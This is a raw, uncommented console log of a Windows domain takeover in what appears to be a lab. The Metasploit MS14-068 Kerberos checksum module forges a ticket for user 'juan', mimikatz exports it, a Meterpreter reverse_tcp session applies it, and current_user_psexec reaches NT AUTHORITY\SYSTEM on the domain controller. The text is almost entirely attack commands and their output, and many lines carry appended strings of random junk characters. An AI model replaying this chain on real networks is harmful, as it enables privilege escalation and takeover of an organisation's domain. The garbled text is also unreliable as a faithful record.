msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > show options 5 U- @! U" R, X9 F: i
Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
6 }6 ~* p, L; D0 Q7 d6 r3 A
Name Current Setting Required Description 0 t6 B1 s% l) o* ] Q- g3 s) v9 W
---- --------------- -------- -----------
DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL 6 _. S+ s, i) o) L; T0 \* E. X
PASSWORD yes The Domain User password
RHOST yes The target address
RPORT 88 yes The target port 9 O+ ^* w W: P$ k8 E! l
Timeout 10 yes The TCP timeout to establish connection and read data $ w' K9 W% {# ]; P7 q
USER yes The Domain User + t9 N+ Y4 G) f2 l
USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000 0 @( T9 O- M3 y$ B
" G9 r. R8 W. j$ |* S
msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN DEMO.LOCAL
DOMAIN => DEMO.LOCAL
msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD juan , O7 V% R8 _/ l8 ?$ z H- C( ?
PASSWORD => juan ' l: f/ }! W( [, m r
msf auxiliary(ms14_068_kerberos_checksum) > set USER juan
USER => juan
msf auxiliary(ms14_068_kerberos_checksum) > set USER_SID S-1-5-21-1755879683-3641577184-3486455962-1000
USER_SID => S-1-5-21-1755879683-3641577184-3486455962-1000
msf auxiliary(ms14_068_kerberos_checksum) > set RHOST WIN-F46QAN3U3UH.demo.local # S- I, H% y8 y* X' q) d3 H1 W
RHOST => WIN-F46QAN3U3UH.demo.local
msf auxiliary(ms14_068_kerberos_checksum) > run
6 b# \$ V! [0 [
- Validating options...
- Using domain DEMO.LOCAL...
- WIN-F46QAN3U3UH.demo.local:88 - Sending AS-REQ...
- WIN-F46QAN3U3UH.demo.local:88 - Parsing AS-REP...
- WIN-F46QAN3U3UH.demo.local:88 - Sending TGS-REQ...! z+ a" J d7 j7 ], ~8 C# L
[+] WIN-F46QAN3U3UH.demo.local:88 - Valid TGS-Response, extracting credentials...
[+] WIN-F46QAN3U3UH.demo.local:88 - MIT Credential Cache saved on /Users/jvazquez/.msf4/loot/20141223201326_default_172.16.158.135_windows.kerber os_194320.bin - Auxiliary module execution completed8 q6 k8 X1 j% v* l0 u
----------------------------------------------
mimikatz # kerberos::clist "20141223201326_default_172.16.158.135_windows.kerber
os_194320.bin" /export / t1 D5 Q6 p$ o9 W; ?) h6 Q) F
Principal : (01) : juan ; @ DEMO.LOCAL
Data 0
Start/End/MaxRenew: 12/24/2014 3:13:21 AM ; 12/24/2014 1:13:06 PM ; 1
2/31/2014 3:13:06 AM % F* @) _0 n: R& x
Service Name (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL
Target Name (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL " d7 X# H# O1 i. h1 x$ ^! ~
Client Name (01) : juan ; @ DEMO.LOCAL 6 i0 p! U% L* @7 J& F& H! u
Flags 00000000 : - E& q% h# n2 K
Session Key : 0x00000017 - rc4_hmac_nt 8 [+ q f5 B' P1 P8 G
1cf7188debe40565eb668b5fa0bf94fb
Ticket : 0x00000000 - null ; kvno = 2 ; f, _6 _. m. ^( i8 B6 _
[...]
* Saved to file 0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi !
mimikatz # ; Q Q" e, V+ g6 `+ Y: O3 M; f3 h- B
---------------------------------------------
( P4 B1 x" x3 A# c6 \' Z5 f% P, O$ Y
" a( S# F1 O* Z w4 L# q& Z
msf auxiliary(ms14_068_kerberos_checksum) > use exploit/multi/handler9 N, ~; }# z6 z0 I' {
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp2 v6 i, O7 c: ]$ k ^
payload => windows/meterpreter/reverse_tcp% S9 @% E4 g2 C0 m
msf exploit(handler) > set lhost 172.16.158.19 @' ^2 n# A/ o8 q
lhost => 172.16.158.1+ E2 |; r l* T8 F6 R8 ^
msf exploit(handler) > exploit
- Started reverse handler on 172.16.158.1:4444
- Starting the payload handler...
- Sending stage (770048 bytes) to 172.16.158.131) b6 f" d ?# C2 } q) w7 d
; v b1 H- {0 v: Z7 c9 {
meterpreter > getuid' `9 V0 S m' Q6 p
Server username: DEMO\juan9 ^. P0 X5 g/ X5 P
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.0 alpha (x86/win32) release "Kiwi en C"
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )1 D6 _6 Q- V- _
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)$ A# Z7 M% _) w/ N
'#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */
success.
meterpreter > kerberos_ticket_use /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi - Using Kerberos ticket stored in /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi, 1143 bytes8 w, ~' U# U# Q" }. {7 b
[+] Kerberos ticket applied successfully
meterpreter >7 i; F; q/ {4 |+ s
meterpreter > background - Backgrounding session 1...
msf exploit(handler) > sessions: P6 X7 h1 R8 F* u( E* d4 Y
Active sessions# u& e2 _# r i/ s. h
===============7 G% c% Y4 @! W- f6 k# e P/ t$ D N
Id Type Information Connection& U; Z- _5 E4 K! k$ ?* T5 p
-- ---- ----------- ----------" `4 o' f, [ D; y2 m& U1 G! e
1 meterpreter x86/win32 DEMO\juan @ EXPLOITER 172.16.158.1:4444 -> 172.16.158.131:63380 (172.16.158.131)* T8 H' A5 q. |9 j: X/ d( ]
* R. ]7 k P+ c
msf exploit(handler) > use exploit/windows/local/current_user_psexec
msf exploit(current_user_psexec) > set TECHNIQUE PSH
TECHNIQUE => PSH0 x5 h6 h3 a) ~- y1 \: [
msf exploit(current_user_psexec) > set RHOSTS WIN-F46QAN3U3UH.demo.local, h4 Z( {5 {/ O# i4 b
RHOSTS => WIN-F46QAN3U3UH.demo.local$ ~* q ^; _8 @. x( N6 _. S
msf exploit(current_user_psexec) > set payload windows/meterpreter/reverse_tcp& Y% [( U# [# l2 D
payload => windows/meterpreter/reverse_tcp$ x6 z+ f- @' V1 j
msf exploit(current_user_psexec) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(current_user_psexec) > set SESSION 1# C3 b7 k: j1 W J V M3 @
SESSION => 1
msf exploit(current_user_psexec) > exploit& c6 e) Z+ v9 x* l
- Started reverse handler on 172.16.158.1:4444
- WIN-F46QAN3U3UH.demo.local Creating service 51cq2zJN6p
- WIN-F46QAN3U3UH.demo.local Starting the service
- Sending stage (770048 bytes) to 172.16.158.135
- WIN-F46QAN3U3UH.demo.local Deleting the service& E2 j& \ O6 @& s
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM' M7 f) z/ T' T0 K- q- B, Q
* x1 K/ c8 a4 Q9 G8 J